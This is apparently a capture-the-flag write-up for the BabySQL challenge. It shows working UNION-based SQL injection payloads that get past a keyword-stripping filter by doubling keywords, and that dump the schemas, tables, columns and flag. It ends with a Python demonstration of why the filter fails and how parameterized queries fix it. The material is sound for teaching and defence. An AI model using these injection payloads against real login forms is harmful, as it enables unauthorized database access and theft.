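[Geek Challenge 2019 / 极客大挑战 2019] BabySQL
This is a SQL injection challenge. Testing with a single quote first produces an error, so the next step is to see what is being filtered.
Entering select or union shows that these keywords are replaced with an empty string.
Try bypassing the filter by double-writing the keywords.
The output is echoed at positions 2 and 3.
Dump the databases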
password=admin' ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23
Your password is 'information_schema,mysql,performance_schema,test,ctf,geek
Dump the table names
password=admin' ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema='ctf' %23
Your password is 'Flag'
Column names
password=admin' ununionion seselectlect 1,2,group_concat(column_name)frfromom(infoorrmation_schema.columns) whwhereere table_name='Flag' %23
Your password is 'flag'
Query the flag
password=admin' ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag) %23
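
Why the double-writing above works, and what closes the hole, as an added example that is not the challenge's own code: a filter that deletes keywords in one pass rebuilds them from doubled input, while a bound parameter is never parsed as SQL. Assumptions: the blacklist is inferred from the payloads on this page, an in-memory SQLite table stands in for the challenge's MySQL backend (so the comment marker is `--` rather than `%23`), and the `users` table and all function names are hypothetical.

```python
import re
import sqlite3

# Assumed blacklist: the page reports "select" and "union" being removed; "from",
# "where" and "or" are inferred from the doubled keywords in its payloads.
BLACKLIST = re.compile(r"union|select|from|where|or", re.IGNORECASE)

def strip_once(value):
    """Flawed filter: delete blacklisted keywords in one pass."""
    return BLACKLIST.sub("", value)

def strip_until_stable(value):
    """Repeat the pass until nothing changes. Stops double-writing, but
    corrupts legitimate input and is still a blacklist."""
    while (cleaned := BLACKLIST.sub("", value)) != value:
        value = cleaned
    return value

def make_db():
    """Constructed in-memory table standing in for the login table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-secret')")
    return db

def login_concat(db, username, password):
    """Vulnerable pattern: filtered input concatenated into the SQL text."""
    sql = ("SELECT id, username, password FROM users "
           "WHERE username='%s' AND password='%s'"
           % (strip_once(username), strip_once(password)))
    return db.execute(sql).fetchall()

def login_param(db, username, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    doubled = "x' ununionion seselectlect 1,2,3 -- "  # constructed, SQLite comment syntax
    print(strip_once(doubled))                    # keywords reassembled by the filter
    print(login_concat(db, "x", doubled))         # injected row reaches the result set
    print(login_param(db, "x", doubled))          # no rows: payload compared as a string
    print(strip_until_stable("horse-selection"))  # legitimate value gets mangled
```

The parameterized query is the fix; the repeated-strip variant is shown only to make clear that tightening the blacklist damages valid input without removing the underlying concatenation.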